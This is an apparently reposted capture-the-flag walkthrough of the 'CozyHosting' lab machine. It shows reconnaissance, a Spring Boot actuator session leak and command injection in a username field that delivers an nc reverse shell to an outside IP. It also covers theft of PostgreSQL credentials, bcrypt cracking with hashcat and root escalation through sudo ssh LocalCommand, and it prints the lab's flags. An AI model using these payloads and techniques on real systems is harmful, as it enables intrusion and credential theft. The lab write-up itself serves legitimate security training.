[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…

2025-02-13 36 0

Information Gathering

IP Address Opening Ports
10.10.11.230 TCP:22,80

$ ip='10.10.11.230'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Spring Boot API sessions leak

# echo "10.10.11.230 cozyhosting.htb">>/etc/hosts

http://cozyhosting.htb/

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图

$ feroxbuster -u 'http://cozyhosting.htb/' -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图1

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图2

$ curl http://cozyhosting.htb/actuator/mappings|jq

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图3

$ curl http://cozyhosting.htb/actuator/sessions|jq

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图4

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图5

Cozy Cloud RCE

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图6

POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin
Cookie: JSESSIONID=E2D6FD319BB33F0C82C7A5BDB7B5BB9E
Upgrade-Insecure-Requests: 1

host=127.0.0.1&username=1;ping -c 1 10.10.16.28

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图7

host=127.0.0.1&username=1;nc+10.10.16.28+443+-e+/bin/bash

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图8

Lateral Movement Via PostgreSQL

app@cozyhosting:/app$ unzip cloudhosting-0.0.1.jar -d /tmp/

app@cozyhosting:/tmp$ grep -grep -iR password

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图9

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图10

username=postgres
password=Vg&nvzAQ7XxR

$ psql -h 127.0.0.1 -U postgres

postgres=# \connect cozyhosting

cozyhosting=# \dt

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图11

cozyhosting=# select * from users;

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图12

kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

$ hashcat.exe hashes.txt --wordlist=./rockyou.txt -m 3200

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图13

manchesterunited

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图14

User.txt

cc93083b7bccc1a1317a42e90f1fbcc2

Privilege Escalation:SSH Abuse

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图15

$ sudo /usr/bin/ssh -v -o PermitLocalCommand=yes -o 'LocalCommand=/bin/bash' josh@127.0.0.1

[Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…插图16

Root.txt

db965b14ba2e4959c7ef2d0f135e0d0e

相关文章:

  1. [Meachines] [Easy] TwoMillion JS混淆解密+API-RCE+OverlayFS权限提升
  2. 可造成敏感信息泄露!Spring Boot Actuator信息泄露漏洞三种利用方式总结
  3. PostgreSQL(ArteryBase3.6.2)数据库等级保护测评指南
  4. C2-Cloud:一款基于Web的C2基础设施交互框架
  5. [Meachines] [Easy] Love File Scanner SSRF+Voting System RCE+Win注册表.MSI权限提升

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

Shellcode加密混淆技术全解析
绕过WPS Office沙箱和Windows Defender的恶意宏攻击分析
Web源码泄露姿势 | 如何寻找泄露源码及黑灰源码
利用隐形Unicode字符的钓鱼攻击:一种新的JS混淆技术
AI比赛大杀器XGBoost结合ast抽象语法树批量识别恶意php文件
语音网络钓鱼新动向:DarkGate恶意软件入侵案例剖析

发布评论